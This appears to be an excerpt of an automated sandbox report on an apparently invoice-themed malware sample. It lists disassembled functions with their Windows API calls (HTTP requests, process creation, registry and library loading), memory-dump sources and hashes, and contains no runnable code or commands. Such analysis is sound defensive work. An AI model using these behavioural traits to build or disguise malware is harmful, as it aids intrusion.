API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: f781da45fd470c0f257e215107aeddbbdb94d5acf362f0378d6e02f2f5d6072a
Instruction ID: 27d0801f30e5840b64e2cb8857845dbd71b76089f9e69383c4ad2cee4c380ce4
Opcode Fuzzy Hash: f781da45fd470c0f257e215107aeddbbdb94d5acf362f0378d6e02f2f5d6072a
Instruction Fuzzy Hash: 8F21D27A900108BEDB44ABA5D887EFF7B78DF16358F10412EF411A21E1DB785D0A97B8

Function 004E43E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004E4401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004E4427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004E4457
InternetCloseHandle.WININET(00000000), ref: 004E449E

Part of subcall function 004E5052: GetLastError.KERNEL32(?,?,004E43CC,00000000,00000000,00000001), ref: 004E5067

Strings

, xrefs: 004E4450

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 37bd158c5d3dc03492a1d8067bab3bee08fa97e2508e2320ecb9bff8cbac8eae
Instruction ID: b7110b8c4d3d56bc84447c8acdc10ae9d79fa27200705bf05f98cbce09c0c714
Opcode Fuzzy Hash: 37bd158c5d3dc03492a1d8067bab3bee08fa97e2508e2320ecb9bff8cbac8eae
Instruction Fuzzy Hash: 722180B1600248BFE7119F96CC85FBB77FCEB88759F10851BF205D2280EA689D059775

Function 004F90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 004AD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004AD1BA
Part of subcall function 004AD17C: GetStockObject.GDI32(00000011), ref: 004AD1CE
Part of subcall function 004AD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 004AD1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 004F915C
LoadLibraryW.KERNEL32(?), ref: 004F9163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 004F9178
DestroyWindow.USER32(?), ref: 004F9180

Strings

SysAnimate32, xrefs: 004F9137

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 4c41e8bffb54b76e8db6eb8909ed06bf450adec297c9ce73e8e11f44a7984843
Instruction ID: aa7775b3c96201327626dbebe4bf4d2d5414dfd35d6a6eaf6cf13e67e7d8b543
Opcode Fuzzy Hash: 4c41e8bffb54b76e8db6eb8909ed06bf450adec297c9ce73e8e11f44a7984843
Instruction Fuzzy Hash: D021807160020ABBFF104F659D85FBB37ADEB95368F10462AFA1492290C735DC52A764

Function 004D9568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 004D9588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004D95B9
GetStdHandle.KERNEL32(0000000C), ref: 004D95CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 004D9605

Strings

nul, xrefs: 004D9600

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 0d66b54a777a28037fa00a249380d203831de721dc3e8259f6e8a69178414c25
Instruction ID: 780067d0eaee5bd5f55c02efddb4d32a74cbb3b24d61a7b9fa256eaf2c6a8f15
Opcode Fuzzy Hash: 0d66b54a777a28037fa00a249380d203831de721dc3e8259f6e8a69178414c25
Instruction Fuzzy Hash: F2219C71600205BBDB219F25EC24A9A7BF8AF55324F204A2BF8A1D73D0D774DD45CB24

Function 004D9634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 004D9653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004D9683
GetStdHandle.KERNEL32(000000F6), ref: 004D9694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 004D96CE

Strings

nul, xrefs: 004D96C9

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: adb85761b445744a6184a6dfa5ad514efd4a021f8ca1b796ed0e2942bac64b15
Instruction ID: 6f19231aa823fa7d644e1abb34afd20bc3ecd1ae2fe93c64d7bd39d41074ceb9
Opcode Fuzzy Hash: adb85761b445744a6184a6dfa5ad514efd4a021f8ca1b796ed0e2942bac64b15
Instruction Fuzzy Hash: E921AF71600205ABDB209F698C24E9AB7F8AF55724F204A5BF8B1E33D0E774DC45CB28

Function 004DDAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004DDB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 004DDB5E
__swprintf.LIBCMT ref: 004DDB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,0052DC00), ref: 004DDBB5

Strings

%lu, xrefs: 004DDB71

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: c6bf4ec416e8b3ef4ad148e73ed159a44842ee146de9ad615b7bcfac63497be5
Instruction ID: 3717a4386974f24a702cef866d62abba778fb808d0206428675cc1c46fa82a37
Opcode Fuzzy Hash: c6bf4ec416e8b3ef4ad148e73ed159a44842ee146de9ad615b7bcfac63497be5
Instruction Fuzzy Hash: 5E219D35A00108AFCB10EBA5D985DEEBBB8EF49708B10406AF509E7251DB75EA05CB64

Function 004CC9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004CC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004CC84A
Part of subcall function 004CC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004CC85D
Part of subcall function 004CC82D: GetCurrentThreadId.KERNEL32 ref: 004CC864
Part of subcall function 004CC82D: AttachThreadInput.USER32(00000000), ref: 004CC86B

GetFocus.USER32 ref: 004CCA05

Part of subcall function 004CC876: GetParent.USER32(?), ref: 004CC884

GetClassNameW.USER32(?,?,00000100), ref: 004CCA4E
EnumChildWindows.USER32(?,004CCAC4), ref: 004CCA76
__swprintf.LIBCMT ref: 004CCA90

Strings

%s%d, xrefs: 004CCA8A

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: 9cbbfbc685844e55732418eecc9b1f690c48cf331694873ba0cd03f459a6913c
Instruction ID: 3a09df3d09aee12e5d8958dd1efe4901639360996ece5ecf0f45b3fbdd668051
Opcode Fuzzy Hash: 9cbbfbc685844e55732418eecc9b1f690c48cf331694873ba0cd03f459a6913c
Instruction Fuzzy Hash: 291172755002096BDF51BF619CC9FEA3B78AF45718F00806FFA0CAA182CB799545DB74

Function 004FE32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004FE33D
_memset.LIBCMT ref: 004FE34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00553D00,00553D44), ref: 004FE37B
CloseHandle.KERNEL32 ref: 004FE38D

Strings

D=U, xrefs: 004FE346

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: D=U
API String ID: 3277943733-4181397963
Opcode ID: 6ed3cc66454d7710967c0d67524a474549b8c804507cc566ccfd25e311ecf088
Instruction ID: 5d674346746780add819cb700d5167a646d2bca957325130295d10ec865e882c
Opcode Fuzzy Hash: 6ed3cc66454d7710967c0d67524a474549b8c804507cc566ccfd25e311ecf088
Instruction Fuzzy Hash: 8DF05EF1540304BAE7101B61AC55FB77EBCEB147D6F004422BF0CDA1A2E3799E14A6B8

Function 004F1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004F19F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 004F1A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 004F1B49
CloseHandle.KERNEL32(?), ref: 004F1BBF

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 299f732058b8ada78663fb3237d755932443c7a22260ce029b34c8ac493233fa
Instruction ID: aff7bbb00ee4d0120b1a125e204251c0dcb944a3c33ceb3d27b264f1b5e4214a
Opcode Fuzzy Hash: 299f732058b8ada78663fb3237d755932443c7a22260ce029b34c8ac493233fa
Instruction Fuzzy Hash: BC81A670600204EBDF10EF65C886BAEBBE5AF15724F04845EF905AF392D7B9A941CB94

Function 004FE062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 004FE1D5
SendMessageW.USER32(?,000000B0,?,?), ref: 004FE20D
IsDlgButtonChecked.USER32(?,00000001), ref: 004FE248
GetWindowLongW.USER32(?,000000EC), ref: 004FE269
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 004FE281

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend$ButtonCheckedLongWindow
String ID:
API String ID: 3188977179-0
Opcode ID: 8e2b996020f754ec0a7cdfa41bedc9180cbb618c497429dadb2b546c09be5cd2
Instruction ID: a76eb093a67d7dcdddb7ef0c7ce3210ba844e504210a127404eb76ce666afc28
Opcode Fuzzy Hash: 8e2b996020f754ec0a7cdfa41bedc9180cbb618c497429dadb2b546c09be5cd2
Instruction Fuzzy Hash: 9F61A234600618AFDB20CF5AC954FBB7BBAEF49302F04405BFA559B3A1C779A940CB19

Function 004D1C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004D1CB4
VariantClear.OLEAUT32(00000013), ref: 004D1D26
VariantClear.OLEAUT32(00000000), ref: 004D1D81
VariantClear.OLEAUT32(?), ref: 004D1DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 004D1E26

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 7a1069fa6f5215f8f40b95be3661336ab870116077d4b213d59b4ac9edf699f8
Instruction ID: 410b82632dd1ea850d25d5d73413af5ff3e81a17c02237a9dd77e89ee510aa6a
Opcode Fuzzy Hash: 7a1069fa6f5215f8f40b95be3661336ab870116077d4b213d59b4ac9edf699f8
Instruction Fuzzy Hash: C75167B5A00209AFCB14CF58C890AAAB7B9FF4C314B15855AED59DB311E334EA11CFA4

Function 004F0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 004F06EE
GetProcAddress.KERNEL32(00000000,?), ref: 004F077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 004F079B
GetProcAddress.KERNEL32(00000000,?), ref: 004F07E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 004F07FB

Part of subcall function 004AE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004DA574,?,?,00000000,00000008), ref: 004AE675
Part of subcall function 004AE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,004DA574,?,?,00000000,00000008), ref: 004AE699

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: c7e93b16013c6b5ce5360ad44e96d61d5d7cec420154393ad22aff8ac068cba1
Instruction ID: 3c4c22b75b8db908a1258418973a641cff97e03d50b641b9712015d16272e1c9
Opcode Fuzzy Hash: c7e93b16013c6b5ce5360ad44e96d61d5d7cec420154393ad22aff8ac068cba1
Instruction Fuzzy Hash: 2E516175A00209DFCF00EFA9C481DADB7F5BF59314B0480AAEA15AB352DB38ED45CB54

Function 004F2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004F3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004F2BB5,?,?), ref: 004F3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004F2EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004F2F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 004F2F75
RegCloseKey.ADVAPI32(?,?), ref: 004F2FA1
RegCloseKey.ADVAPI32(00000000), ref: 004F2FAE

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: 14450eaac17245e7140ee0c7b2a89c6e3e2adb40248a4b6ce92139fffa2a84a3
Instruction ID: 4e5d54a86aa154cec5bb32ef1f7624ff87f0e332d6ddd4359dfea9d4a165e062
Opcode Fuzzy Hash: 14450eaac17245e7140ee0c7b2a89c6e3e2adb40248a4b6ce92139fffa2a84a3
Instruction Fuzzy Hash: D9516D71218204AFCB04EF55C991E6BBBF9FF88308F00882EF65597291DB74E905DB66

Function 004E8DE2 Relevance: 7.6, APIs: 5, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 004E8E7C
WSAGetLastError.WS2_32(00000000), ref: 004E8E89
__WSAFDIsSet.WS2_32(00000000,00000001), ref: 004E8EAD
_strlen.LIBCMT ref: 004E8EF7
WSAGetLastError.WS2_32(00000000), ref: 004E8F6A

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: 785f56335231821b76eed82f14ee405196cad11e08d98007675f0237a78cc4ef
Instruction ID: 49d71281c5b8e4fa4f5d7230428d0a20cb333bc6916ed756aa73fd2e4ba7e1b2
Opcode Fuzzy Hash: 785f56335231821b76eed82f14ee405196cad11e08d98007675f0237a78cc4ef
Instruction Fuzzy Hash: B941B271900104AFCB14EBA6C995EAEB7B9AB58315F10456EF01A972D1DF38AE04CB68

Function 004FCCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13ce57e0b832f998ba101b15c818868b38e9ad5558d714cd2a79815fc6e5a295
Instruction ID: a55d8ad1cd79a09e1ee3030aab558a3615f6eeb836e8f3257a083a4689555f1a
Opcode Fuzzy Hash: 13ce57e0b832f998ba101b15c818868b38e9ad5558d714cd2a79815fc6e5a295
Instruction Fuzzy Hash: 9941C43990021CABDB10DB68CD84FBABF78EB09310F144126EA59A72D1C778AD05D658

Function 004E1206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004E12B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 004E12DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 004E131C

Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 004E1341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 004E1349

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
